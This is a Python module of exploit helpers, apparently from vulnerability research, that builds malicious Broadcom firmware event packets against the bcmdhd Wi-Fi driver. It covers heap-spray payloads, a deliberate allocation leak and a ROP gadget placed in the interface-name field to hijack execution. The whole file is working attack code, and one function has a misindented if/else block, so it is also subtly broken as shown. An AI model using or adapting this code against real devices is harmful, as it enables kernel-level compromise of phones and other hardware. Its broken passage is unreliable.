from defs import *
from cstruct import *
from structs import *
from symbols import *
import struct

def create_gscan_payload(spray_len, is_complete=False):
    
    #Making sure the given content's length matches the length constaints
    #on the heap spraying primitive
    count = 0
    if spray_len < SIZE_OF_GSCAN_RESULTS_CACHE_T:
        raise Exception("Spray length too small - %d < %d" % (spray_len, SIZE_OF_GSCAN_RESULTS_CACHE_T))

    count = 1 #At least on result at this point
    slack_len = spray_len - SIZE_OF_GSCAN_RESULTS_CACHE_T

    if slack_len % SIZE_OF_WIFI_GSCAN_RESULT_T != 0:
        raise Exception("Slack length not divisible by SIZE_OF_WIFI_GSCAN_RESULT_T: %d" % slack_len)

    count += (slack_len / SIZE_OF_WIFI_GSCAN_RESULT_T)

    #Encoding all the layers of the event packet
    bcmeth_hdr = cstruct(bcmeth_hdr_t)
    wl_event_msg = cstruct(wl_event_msg_t)
    wl_pfn_scanresults = cstruct(wl_pfn_scanresults_t)

    bcmeth_hdr['subtype'] = BCMILCP_SUBTYPE_VENDOR_LONG
    bcmeth_hdr['version'] = 0x00
    bcmeth_hdr['length'] = wl_event_msg.size() + wl_pfn_scanresults.size() + spray_len
    bcmeth_hdr['oui'] = BRCM_OUI
    bcmeth_hdr['usr_subtype'] = BCMILCP_BCM_SUBTYPE_EVENT
                            
    wl_event_msg['version'] = 2
    wl_event_msg['flags'] = 0x00
    wl_event_msg['event_type'] = WLC_E_PFN_BSSID_NET_FOUND
    wl_event_msg['status'] = 0x00
    wl_event_msg['reason'] = 0x00
    wl_event_msg['auth_type'] = 0x00
    wl_event_msg['datalen'] = wl_pfn_scanresults.size() + spray_len
    wl_event_msg['addr'] = '\xcc\xcc\xcc\xcc\xcc\xcc'
    wl_event_msg['ifname'] = 'UnusedIfName'
    wl_event_msg['ifidx'] = 0x00
    wl_event_msg['bsscfgidx'] = 0x00

    wl_pfn_scanresults['version'] = 0x00
        if is_complete:
            wl_pfn_scanresults['status'] = PFN_COMPLETE    
        else:
            wl_pfn_scanresults['status'] = PFN_INCOMPLETE #This causes the allocation to leak!
    wl_pfn_scanresults['count'] = count 

    #Concatenating the layers and appending the spray filler bytes
    #NOTE: The last layer is encoded in little-endian, since bcmdhd fails to convert its
    #byte order before parsing!
    bcm_evt = bcmeth_hdr.encode() + wl_event_msg.encode() + wl_pfn_scanresults.encode("<") + ("\xCC" * spray_len)    
    return bcm_evt

def create_swc_packet(total_length, pkt_content):

    #Verifying that the length's match the constaints
    if total_length == 0:
        raise Exception("Total length must be larger than zero!")
    if total_length % SIZE_OF_WL_PFN_SIGNIFICANT_NET != 0:
        raise Exception("Total length not divisible by SIZE_OF_WL_PFN_SIGNIFICANT_NET: %d" % total_length)
    if len(pkt_content) % SIZE_OF_WL_PFN_SIGNIFICANT_NET != 0:
        raise Exception("Pkt length not divisible by SIZE_OF_WL_PFN_SIGNIFICANT_NET: %d" % len(pkt_content))

    #Encoding all the layers of the event packet
    bcmeth_hdr = cstruct(bcmeth_hdr_t)
    wl_event_msg = cstruct(wl_event_msg_t)
    wl_pfn_swc_results = cstruct(wl_pfn_swc_results_t)

    bcmeth_hdr['subtype'] = BCMILCP_SUBTYPE_VENDOR_LONG
    bcmeth_hdr['version'] = 0x00
    bcmeth_hdr['length'] = wl_event_msg.size() + wl_pfn_swc_results.size() + len(pkt_content)
    bcmeth_hdr['oui'] = BRCM_OUI
    bcmeth_hdr['usr_subtype'] = BCMILCP_BCM_SUBTYPE_EVENT
                            
    wl_event_msg['version'] = 2
    wl_event_msg['flags'] = 0x00
    wl_event_msg['event_type'] = WLC_E_PFN_SWC
    wl_event_msg['status'] = 0x00
    wl_event_msg['reason'] = 0x00
    wl_event_msg['auth_type'] = 0x00
    wl_event_msg['datalen'] = wl_pfn_swc_results.size() + len(pkt_content)
    wl_event_msg['addr'] = '\xcc\xcc\xcc\xcc\xcc\xcc'
    wl_event_msg['ifname'] = 'UnusedIfName'
    wl_event_msg['ifidx'] = 0x00
    wl_event_msg['bsscfgidx'] = 0x00

    wl_pfn_swc_results['version'] = 0x00
    wl_pfn_swc_results['total_count'] = total_length / SIZE_OF_WL_PFN_SIGNIFICANT_NET
    wl_pfn_swc_results['pkt_count'] = len(pkt_content) / SIZE_OF_WL_PFN_SIGNIFICANT_NET    

    #Concatenating the layers
    #NOTE: The last layer is encoded in little-endian, since bcmdhd fails to convert its
    #byte order before parsing!
    bcm_evt = bcmeth_hdr.encode() + wl_event_msg.encode() + wl_pfn_swc_results.encode("<") + pkt_content
    return bcm_evt

def create_ssid_packet(rop_payload):
    
        #Encoding all the layers of the event packet
    bcmeth_hdr = cstruct(bcmeth_hdr_t)
    wl_event_msg = cstruct(wl_event_msg_t)

    bcmeth_hdr['subtype'] = BCMILCP_SUBTYPE_VENDOR_LONG
    bcmeth_hdr['version'] = 0x00
    bcmeth_hdr['length'] = wl_event_msg.size() + len(rop_payload)
    bcmeth_hdr['oui'] = BRCM_OUI
    bcmeth_hdr['usr_subtype'] = BCMILCP_BCM_SUBTYPE_EVENT
                            
    wl_event_msg['version'] = 2
    wl_event_msg['flags'] = 0x00
    wl_event_msg['event_type'] = WLC_E_SET_SSID
    wl_event_msg['status'] = 0x00
    wl_event_msg['reason'] = 0x00
    wl_event_msg['auth_type'] = 0x00
    wl_event_msg['datalen'] = len(rop_payload)
    wl_event_msg['addr'] = '\xcc\xcc\xcc\xcc\xcc\xcc'
    
    #This gadget is just used to skip ove rthe remaining bytes in the event header. The next
    #PC is loaded from the supplied ROP chain
    wl_event_msg['ifname'] = "\xCC\xCC" + struct.pack("<I", POP_R4_R5_R6_PC) + ("\xCC" * 10)
    wl_event_msg['ifidx'] = 0x00
    wl_event_msg['bsscfgidx'] = 0x00

    #Concatenating the layers and appending the spray filler bytes
    bcm_evt = bcmeth_hdr.encode() + wl_event_msg.encode() + rop_payload
    return bcm_evt

def create_join_packet(payload):
    
        #Encoding all the layers of the event packet
    bcmeth_hdr = cstruct(bcmeth_hdr_t)
    wl_event_msg = cstruct(wl_event_msg_t)

    bcmeth_hdr['subtype'] = BCMILCP_SUBTYPE_VENDOR_LONG
    bcmeth_hdr['version'] = 0x00
    bcmeth_hdr['length'] = wl_event_msg.size() + len(payload)
    bcmeth_hdr['oui'] = BRCM_OUI
    bcmeth_hdr['usr_subtype'] = BCMILCP_BCM_SUBTYPE_EVENT
                            
    wl_event_msg['version'] = 2
    wl_event_msg['flags'] = 0x00
    wl_event_msg['event_type'] = WLC_E_JOIN
    wl_event_msg['status'] = 0x00
    wl_event_msg['reason'] = 0x00
    wl_event_msg['auth_type'] = 0x00
    wl_event_msg['datalen'] = len(payload)
    wl_event_msg['addr'] = '\xcc\xcc\xcc\xcc\xcc\xcc'
    wl_event_msg['ifname'] = 'UnusedIfName'
    wl_event_msg['ifidx'] = 0x00
    wl_event_msg['bsscfgidx'] = 0x00

    #Concatenating the layers and appending the spray filler bytes
    bcm_evt = bcmeth_hdr.encode() + wl_event_msg.encode() + payload
    return bcm_evt

